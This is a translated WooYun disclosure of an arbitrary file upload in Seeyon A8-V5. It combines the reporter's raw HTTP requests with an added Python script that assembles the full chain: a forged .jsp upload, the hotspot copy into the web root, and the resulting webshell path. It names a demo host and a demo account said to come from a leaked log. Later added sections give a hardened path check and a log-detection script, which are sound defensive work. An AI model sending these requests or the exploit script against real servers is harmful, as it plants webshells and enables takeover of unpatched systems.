Vulnerability Summary

Defect ID: wooyun-2014-088260

Title: Seeyon A8-V5 Collaborative Management Software: arbitrary file upload by an ordinary user (affects all V5 versions)

Vendor: seeyon.com

Author: 路人甲

Submitted: 2014-12-23 14:26

Fixed: 2015-02-06 14:28

Published: 2015-02-06 14:28

Type: file upload leading to arbitrary code execution

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]


Vulnerability Details

Disclosure status:

2014-12-23: details sent to the vendor, awaiting the vendor's handling
2014-12-26: vendor confirmed; details disclosed to the vendor only
2014-12-29: details opened to third-party security partners
2015-02-19: details opened to core white hats and domain experts
2015-03-01: details opened to ordinary white hats
2015-03-11: details opened to intern white hats
2015-02-06: details disclosed to the public

Brief description:

I have been poking at Seeyon A8-V5 for the past few days. Yesterday I found a few minor issues; today, digging further, I found an arbitrary file upload vulnerability.

Detailed description:

Seeyon A8-V5 lets an ordinary user invoke a function that belongs to the system administrator role, Login Page Template Management. Opening it in the browser fails with an "insufficient permissions" message, but that check evidently covers only the page entry point: sending the page's underlying ajax.do requests (managerName=loginTemplateManager) directly succeeds.
Seeyon A8-V5 clearly took the danger of uploaded files into account: throughout the system, uploads are cached in a directory outside the web root, so an upload on its own does not yield a webshell. But Login Page Template Management has a function that copies a cached file into the web directory (it is meant to place a hotspot image), and that copy is enough to obtain a webshell.

Proof of concept:

Demo site:
http://a8v51.seeyon.com/
Demo account: scyd/123456, obtained from a leaked log.
Steps:
1. Use a legitimate session to obtain the template ID.
2. Bypass the extension restriction and upload an executable .jsp file.
3. Use the copy-to-web-directory behaviour to move the file cached outside the web root into an arbitrary web directory.
Proof:
1. Use a legitimate session to obtain the template ID
Request:

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 74
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=4DD87116B4082E92D03F5BB3F7F0C56F; loginPageURL="/main.do"; avatarImageUrl=8469117046183055270; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849; Hm_lpvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849

managerMethod=selectTemplateById&arguments=["2676694155142778633"]


Response:

{"name":"登录页-单图片式","path":"default\/login.jsp","description":"单图片式,极简风格","updateTime":"2014-12-22 00:00","sort":"1","preset":1,"updateUser":"8469117046183055270","cdefault":0,"thumbnail":"default\/thumbnail.png","id":"2676694155142778633","new":false,"extraMap":{}}


Record the value of the id field in the response: 2676694155142778633.
2. Bypass the extension restriction and upload an executable .jsp file
In the original POST request, modify the extensions field by appending jsp to "jpg,jpeg,gif,bmp,png", and change the filename's extension from .jpg to .jsp. The list of permitted extensions is a form field supplied by the client, so the server accepts whatever list it is sent.
The modified request:

POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0
Accept: text/html, application/xhtml+xml, */*
Referer: http://a8v51.seeyon.com/seeyon/fileUpload.do?type=&firstSave=true&applicationCategory=1&extensions=jpg,jpeg,gif,bmp,png&quantity=1&isEncrypt=false&attachmentTrId=poi3&callMethod=uploadCallBack2&maxSize=2097152&takeOver=true&_isModalDialog=true
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: multipart/form-data; boundary=---------------------------7ded626340460
Proxy-Connection: Keep-Alive
Pragma: no-cache
Content-Length: 76766
DNT: 1
Host: a8v51.seeyon.com
Cookie: JSESSIONID=3385E1567ED6D100FD461F2299761286; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

-----------------------------7ded626340460
Content-Disposition: form-data; name="type"


-----------------------------7ded626340460
Content-Disposition: form-data; name="extensions"

jpg,jpeg,gif,bmp,png,jsp
-----------------------------7ded626340460
Content-Disposition: form-data; name="applicationCategory"

1
-----------------------------7ded626340460
Content-Disposition: form-data; name="destDirectory"


-----------------------------7ded626340460
Content-Disposition: form-data; name="destFilename"


-----------------------------7ded626340460
Content-Disposition: form-data; name="maxSize"

2097152
-----------------------------7ded626340460
Content-Disposition: form-data; name="isEncrypt"

false
-----------------------------7ded626340460
Content-Disposition: form-data; name="callMethod"

uploadCallBack2
-----------------------------7ded626340460
Content-Disposition: form-data; name="attachmentTrId"

poi3
-----------------------------7ded626340460
Content-Disposition: form-data; name="firstSave"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="takeOver"

true
-----------------------------7ded626340460
Content-Disposition: form-data; name="file1"; filename="wooyun.jsp"
Content-Type: text/plain

<%--
jsp File browser 1.2

--%>
-----------------------------7ded626340460--


Search the response for ".jsp" and record the value in

fileurls=fileurls+","+'-4028755744185366901';

that is, -4028755744185366901. This is the attachment ID of the file now cached outside the web root; it becomes picFileId in step 3.
3. Use the copy-to-web-directory behaviour to move the file cached outside the web root into an arbitrary web directory
First, look at how the source code is written:

if ("1".equals(hotSpotType)) {                                   // hotspot type 1 = image hotspot
    String picFileId = (String)params.get("picFileId" + i);      // attachment ID, taken from the request as-is
    if ((picFileId != null) && (picFileId.trim().length() > 0)) {
        // resolves the cached upload (stored outside the web root) by its attachment ID
        File uploadedFile = this.fileManager.getFile(Long.valueOf(Long.parseLong(picFileId)), new Date());
        try {
            // destination = <directory of hotspotvalue> + picFileId + <extension of hotspotvalue>;
            // both the directory and the extension come from the client-supplied hotspotvalue
            String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());
            FileCopyUtils.copy(uploadedFile, new File(Template_Parent_Path + targetUrl));   // copy into the web directory
            this.fileSynchronization.copy(new FileInputStream(uploadedFile), "main/login/" + targetUrl);
            hotspot.setHotspotvalue(targetUrl);
        } catch (IOException e) {
            throw new BusinessException("存放图片文件出错:" + e);
        }
    }
}
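To make the string logic above concrete, here is an added example (my code, not Seeyon's) that reproduces the targetUrl computation in Python exactly as the Java expression does it, and beside it the checks the copy step should have made before writing under the web root. The template root path is a constructed placeholder for Template_Parent_Path, the numeric-id rule for picFileId and the image allow-list are my proposals, and `compute_target_url` / `hardened_target_url` are names of mine:

```python
import posixpath

# Constructed stand-in for Template_Parent_Path; the real path is deployment-specific.
TEMPLATE_ROOT = "/opt/seeyon/webapps/seeyon/main/login"
# Server-side allow-list; the page shows the client sending "jpg,jpeg,gif,bmp,png" itself.
ALLOWED_IMAGE_EXT = {".jpg", ".jpeg", ".gif", ".bmp", ".png"}


def compute_target_url(hotspotvalue: str, pic_file_id: str) -> str:
    """Python rendering of the quoted Java expression:
    hotspotvalue.substring(0, lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(lastIndexOf("."))
    Java's lastIndexOf returns -1 when the character is absent, so a value without "/" keeps
    no directory, and a value without "." throws (mirrored here with ValueError)."""
    slash = hotspotvalue.rfind("/")
    dot = hotspotvalue.rfind(".")
    if dot < 0:
        raise ValueError("hotspotvalue has no extension")
    return hotspotvalue[: slash + 1] + pic_file_id + hotspotvalue[dot:]


def hardened_target_url(hotspotvalue: str, pic_file_id: str, root: str = TEMPLATE_ROOT) -> str:
    """The checks the copy step is missing (my proposal, not vendor code):
    1. picFileId is an attachment key, so it must be an integer, never path text;
    2. the destination extension must come from a server-side image allow-list, so the
       client cannot turn the copy into a .jsp;
    3. the resolved destination must stay under the template root, so ".." in
       hotspotvalue cannot walk into another web directory.
    Validating the cached attachment's content (magic bytes) belongs at upload time and
    is not covered here."""
    if not pic_file_id.lstrip("-").isdigit():
        raise ValueError("picFileId must be an integer id")
    ext = posixpath.splitext(hotspotvalue)[1].lower()
    if ext not in ALLOWED_IMAGE_EXT:
        raise ValueError(f"extension {ext!r} is not an allowed image type")
    rel = posixpath.normpath(posixpath.join(posixpath.dirname(hotspotvalue), pic_file_id + ext))
    root = root.rstrip("/")
    full = posixpath.normpath(posixpath.join(root, rel))
    if not full.startswith(root + "/"):
        raise ValueError("destination escapes the template root")
    return rel


if __name__ == "__main__":
    # The values from this report: the cached upload becomes default/<id>.jsp under main/login/.
    print(compute_target_url("default/-4028755744185366901.jsp", "-4028755744185366901"))
    # The same inputs against the hardened version are rejected on the extension.
    try:
        hardened_target_url("default/-4028755744185366901.jsp", "-4028755744185366901")
    except ValueError as e:
        print("rejected:", e)
```

Because the Java code takes the directory from everything before the last "/" with no normalisation, `compute_target_url("../../x/y.jsp", "7")` yields `../../x/7.jsp`; that is what "arbitrary web directory" in step 3 rests on, and the third check in the hardened version is what closes it.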


Two parameters decide whether this succeeds: picFileId, which selects the cached file, and targetUrl, which decides where it is written.
In this demonstration:
picFileId is the value from step 2, -4028755744185366901
targetUrl is built as

String targetUrl = hotspotvalue.substring(0, hotspotvalue.lastIndexOf("/") + 1) + picFileId + hotspotvalue.substring(hotspotvalue.lastIndexOf("."), hotspotvalue.length());

picFileId is known, and hotspotvalue is entirely ours to set, so both the destination directory (everything up to the last "/") and the destination extension (everything from the last ".") are attacker-controlled; nothing restricts either to an image path.
The fields we set belong to the last hotspot in the request below (picFileId7 and hotspotvalue7). If the template ID obtained in step 1 differs, replace the id values below with that ID.
The request:

POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://a8v51.seeyon.com/seeyon/portal/loginTemplateController.do?method=loginTemplateMain&entityType=1&_resourceCode=T03_loginTemplateList
Accept-Language: zh-cn
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: a8v51.seeyon.com
Content-Length: 5255
DNT: 1
Pragma: no-cache
Cookie: JSESSIONID=31BEBA9DAA457E8E8280E97175FD4DBB; loginPageURL="/main.do"; avatarImageUrl=-7273032013234748168; pgv_pvi=3462602752

managerMethod=transSaveTemplate&arguments=[{"id":"2676694155142778633","entityLevel":"system","entityId":"-1730833917365171641","name":"登录页-单图片式","description":"单图片式，极简风格","sort":"1","path":"default/login.jsp","hotSpotsCount":"8","hotSpotId0":"1186536015593226561","hotSpotType0":"0","templateId0":"2676694155142778633","hotspotkey0":"note","description0":"","entityId0":"-1730833917365171641","entityLevel0":"System","hotspotName0":"hotspot.name.note","hotspotModule0":"0","hotspotSort0":"0","hotspotRead0":"0","showdisplay0":"0","hotAccountId0":"-1730833917365171641","hotspotvalue0":"致远A8-V5协同管理软件","hotSpotId1":"-2858574230077355948","hotSpotType1":"0","templateId1":"2676694155142778633","hotspotkey1":"note","description1":"","entityId1":"-1730833917365171641","entityLevel1":"System","hotspotName1":"hotspot.name.note","hotspotModule1":"0","hotspotSort1":"0","hotspotRead1":"0","showdisplay1":"0","hotAccountId1":"-1730833917365171641","hotspotvalue1":"致远A8-V5协同管理软件","hotSpotId2":"-6590619288520733107","hotSpotType2":"1","templateId2":"2676694155142778633","hotspotkey2":"contentbgi","description2":"","entityId2":"-1730833917365171641","entityLevel2":"System,Account","hotspotName2":"hotspot.name.loginpic","hotspotModule2":"0","hotspotSort2":"1","hotspotRead2":"0","showdisplay2":"0","hotAccountId2":"-1730833917365171641","picFileId2":"","hotspotvalue2":"default/images/main_content_ie6.jpg","hotSpotId3":"-151221304857771845","hotSpotType3":"1","templateId3":"2676694155142778633","hotspotkey3":"contentbgi","description3":"","entityId3":"-1730833917365171641","entityLevel3":"System,Account","hotspotName3":"hotspot.name.loginpic","hotspotModule3":"0","hotspotSort3":"1","hotspotRead3":"0","showdisplay3":"0","hotAccountId3":"-1730833917365171641","picFileId3":"","hotspotvalue3":"default/images/main_content_ie6.jpg","hotSpotId4":"-8315917587715897900","hotSpotType4":"2","templateId4":"2676694155142778633","hotspotkey4":"mainbgc","description4":"","entityId4":"-1730833917365171641","entityLevel4":"System,Account","hotspotName4":"hotspot.name.mainbgc","hotspotModule4":"0","hotspotSort4":"2","hotspotRead4":"0","showdisplay4":"0","hotAccountId4":"-1730833917365171641","hotspotvalue4":"#fafafa","hotSpotId5":"7763739069174663407","hotSpotType5":"2","templateId5":"2676694155142778633","hotspotkey5":"mainbgc","description5":"","entityId5":"-1730833917365171641","entityLevel5":"System,Account","hotspotName5":"hotspot.name.mainbgc","hotspotModule5":"0","hotspotSort5":"2","hotspotRead5":"0","showdisplay5":"0","hotAccountId5":"-1730833917365171641","hotspotvalue5":"#fafafa","hotSpotId6":"5768369956880141892","hotSpotType6":"1","templateId6":"2676694155142778633","hotspotkey6":"mainbgi","description6":"","entityId6":"-1730833917365171641","entityLevel6":"System","hotspotName6":"hotspot.name.mainbgi","hotspotModule6":"0","hotspotSort6":"3","hotspotRead6":"0","showdisplay6":"0","hotAccountId6":"-1730833917365171641","picFileId6":"","hotspotvalue6":"default/images/main_bg.png","hotspotTiling6":"1","hotSpotId7":"-3488186128041623434","hotSpotType7":"1","templateId7":"2676694155142778633","hotspotkey7":"mainbgi","description7":"","entityId7":"-1730833917365171641","entityLevel7":"System","hotspotName7":"hotspot.name.mainbgi","hotspotModule7":"0","hotspotSort7":"3","hotspotRead7":"0","showdisplay7":"0","hotAccountId7":"-1730833917365171641","picFileId7":"-4028755744185366901","hotspotvalue7":"default/-4028755744185366901.jsp","hotspotTiling7":"1"}]


A response of null means success: the file cached outside the web directory has been copied into the web directory.
Webshell address:

http://a8v51.seeyon.com/seeyon/main/login/default/-4028755744185366901.jsp
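The three steps above as one offline script (an added example, not the author's tooling): it parses the step-1 JSON, builds the step-2 multipart body with the two modifications the report describes, extracts the attachment ID from the upload callback, and assembles the step-3 transSaveTemplate arguments. The sample responses and the abbreviated template dictionary are constructed by me from the values shown on this page; a real transSaveTemplate call must carry every hotspot of the template (hotSpotsCount of them), not just the one changed here. The `post` helper only shows how the pieces would be sent with a session cookie; nothing in the script contacts a server, and the function names are mine.

```python
import json
import re
import urllib.request

# Constructed sample data (mine, assembled from values on this page; not captured traffic).
SAMPLE_SELECT_RESPONSE = '{"name":"登录页-单图片式","path":"default/login.jsp","id":"2676694155142778633","new":false}'
SAMPLE_UPLOAD_RESPONSE = "<script>fileurls=fileurls+\",\"+'-4028755744185366901';</script>"
# Abbreviated template: only the image hotspot we rewrite; a real call carries all of them.
SAMPLE_TEMPLATE = {
    "id": "2676694155142778633", "entityLevel": "system", "entityId": "-1730833917365171641",
    "name": "登录页-单图片式", "path": "default/login.jsp", "hotSpotsCount": "8",
    "hotSpotId7": "-3488186128041623434", "hotSpotType7": "1", "templateId7": "2676694155142778633",
    "hotspotkey7": "mainbgi", "picFileId7": "", "hotspotvalue7": "default/images/main_bg.png",
}


def template_id_from_select(response_text: str) -> str:
    """Step 1: selectTemplateById answers with a JSON object; its 'id' is what later steps need."""
    return json.loads(response_text)["id"]


def build_upload_body(boundary: str, file_bytes: bytes, filename: str = "wooyun.jsp",
                      client_extensions: str = "jpg,jpeg,gif,bmp,png,jsp") -> bytes:
    """Step 2: multipart body for fileUpload.do?method=processUpload with the report's two edits:
    'jsp' appended to the client-supplied extensions list and a .jsp filename."""
    fields = [("type", ""), ("extensions", client_extensions), ("applicationCategory", "1"),
              ("destDirectory", ""), ("destFilename", ""), ("maxSize", "2097152"),
              ("isEncrypt", "false"), ("callMethod", "uploadCallBack2"),
              ("attachmentTrId", "poi3"), ("firstSave", "true"), ("takeOver", "true")]
    out = bytearray()
    for name, value in fields:
        out += f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n'.encode()
    out += (f'--{boundary}\r\nContent-Disposition: form-data; name="file1"; filename="{filename}"\r\n'
            f'Content-Type: text/plain\r\n\r\n').encode()
    out += file_bytes + b"\r\n" + f"--{boundary}--\r\n".encode()
    return bytes(out)


# The callback page carries: fileurls=fileurls+","+'<attachment id>';
FILEURL_RE = re.compile(r"""fileurls=fileurls\+","\+'(-?\d+)'""")


def file_id_from_upload_response(html: str) -> str:
    """Step 2 result: the attachment ID of the file cached outside the web root (the picFileId)."""
    m = FILEURL_RE.search(html)
    if m is None:
        raise ValueError("upload response carries no attachment id")
    return m.group(1)


def build_trans_save_arguments(template: dict, hotspot_index: int, file_id: str) -> str:
    """Step 3: the 'arguments' value for managerMethod=transSaveTemplate. One image hotspot is
    changed: picFileId<N> names the cached attachment, hotspotvalue<N> supplies the directory and
    the extension from which the copy routine builds targetUrl."""
    t = dict(template)
    t[f"picFileId{hotspot_index}"] = file_id
    t[f"hotspotvalue{hotspot_index}"] = f"default/{file_id}.jsp"
    return json.dumps([t], ensure_ascii=False, separators=(",", ":"))


def webshell_path(file_id: str) -> str:
    """Where the copy lands: 'main/login/' + targetUrl under the seeyon context."""
    return f"/seeyon/main/login/default/{file_id}.jsp"


def post(url: str, body: bytes, content_type: str, cookie: str) -> str:
    """Plain urllib POST carrying the session cookie; shown for completeness, never called here."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type, "Cookie": cookie,
                                          "X-Requested-With": "XMLHttpRequest"})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8", "replace")


def run_offline() -> dict:
    """The whole chain against the constructed samples; returns what a live run would need."""
    template_id = template_id_from_select(SAMPLE_SELECT_RESPONSE)
    body = build_upload_body("---------------------------7ded626340460", b"<%-- constructed marker --%>")
    file_id = file_id_from_upload_response(SAMPLE_UPLOAD_RESPONSE)
    args = build_trans_save_arguments(SAMPLE_TEMPLATE, 7, file_id)
    return {"template_id": template_id, "upload_body_len": len(body), "file_id": file_id,
            "arguments": args, "shell": webshell_path(file_id)}


if __name__ == "__main__":
    for k, v in run_offline().items():
        print(k, "=", v)
```

The `arguments` string is sent URL-encoded as the `arguments` form field, together with `managerMethod=transSaveTemplate`, to ajax.do?method=ajaxAction&managerName=loginTemplateManager, as in the captured request above.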


Note: the file cannot be deleted.
It is not that I did not delete it.
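For the defensive side, an added detection example (mine, not from the page or the vendor) that runs over constructed Tomcat access-log lines and flags the two traces this chain leaves: a fileUpload.do processUpload POST followed by a loginTemplateManager ajax.do call from the same client, and any request for an id-named .jsp under /seeyon/main/login/ (the copy routine names the file after picFileId, so a template image directory containing a numeric-named .jsp is exactly the artefact of step 3). It assumes the combined log format without cookie logging, so clients are correlated by IP; the log lines, the window length and the function names are constructed by me:

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Tomcat combined-format lines (not from the target). 10.0.0.5 performs the chain
# from this report; 10.0.0.9 only loads the normal login page and its background image.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Dec/2014:14:01:10 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager HTTP/1.0" 200 312
10.0.0.5 - - [23/Dec/2014:14:02:03 +0800] "POST /seeyon/fileUpload.do?method=processUpload HTTP/1.0" 200 1844
10.0.0.5 - - [23/Dec/2014:14:03:41 +0800] "POST /seeyon/ajax.do?method=ajaxAction&managerName=loginTemplateManager&rnd=75321 HTTP/1.0" 200 4
10.0.0.5 - - [23/Dec/2014:14:04:02 +0800] "GET /seeyon/main/login/default/-4028755744185366901.jsp HTTP/1.1" 200 9123
10.0.0.9 - - [23/Dec/2014:14:05:00 +0800] "GET /seeyon/main/login/default/login.jsp HTTP/1.1" 200 5120
10.0.0.9 - - [23/Dec/2014:14:05:01 +0800] "GET /seeyon/main/login/default/images/main_bg.png HTTP/1.1" 200 23000
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# The copy step writes <dir>/<picFileId>.<ext>; a numeric-named .jsp under main/login/ is its signature.
ID_NAMED_JSP = re.compile(r"^/seeyon/main/login/.+/-?\d+\.jsp(?:[?;]|$)")


def parse_line(line: str):
    """One combined-format line to a dict with an aware datetime, or None if it does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def is_upload(rec) -> bool:
    return (rec["method"] == "POST" and rec["path"].startswith("/seeyon/fileUpload.do")
            and "method=processUpload" in rec["path"])


def is_template_manager_call(rec) -> bool:
    return (rec["method"] == "POST" and rec["path"].startswith("/seeyon/ajax.do")
            and "managerName=loginTemplateManager" in rec["path"])


def detect(lines, window_seconds: int = 600):
    """Returns (ip, reason, timestamp) findings.
    Rule 1: a loginTemplateManager call within window_seconds after a processUpload by the same IP.
    Rule 2: any GET for an id-named .jsp under /seeyon/main/login/.
    Template-manager calls before the upload (step 1 here) are not flagged on their own, since an
    administrator legitimately uses that manager."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            by_ip[rec["ip"]].append(rec)
    findings = []
    for ip, recs in by_ip.items():
        recs.sort(key=lambda r: r["ts"])
        upload_times = [r["ts"] for r in recs if is_upload(r)]
        for r in recs:
            if is_template_manager_call(r) and any(
                    0 <= (r["ts"] - u).total_seconds() <= window_seconds for u in upload_times):
                findings.append((ip, "loginTemplateManager call after processUpload", r["ts"]))
            if r["method"] == "GET" and ID_NAMED_JSP.match(r["path"]):
                findings.append((ip, "id-named .jsp under /seeyon/main/login/", r["ts"]))
    return findings


if __name__ == "__main__":
    for ip, reason, ts in detect(SAMPLE_LOG.splitlines()):
        print(ts.isoformat(), ip, reason)
```

Rule 2 also works as a filesystem check independent of logs: list main/login/ recursively for files matching the same numeric-name .jsp pattern, since step 3 leaves the file on disk whether or not it was ever requested.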

Fix recommendation:

Copyright notice: when reposting, please credit 路人甲@乌云 (WooYun)


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-12-26 10:20

Vendor reply:

Reproduced; fix in progress.

Latest status:

None yet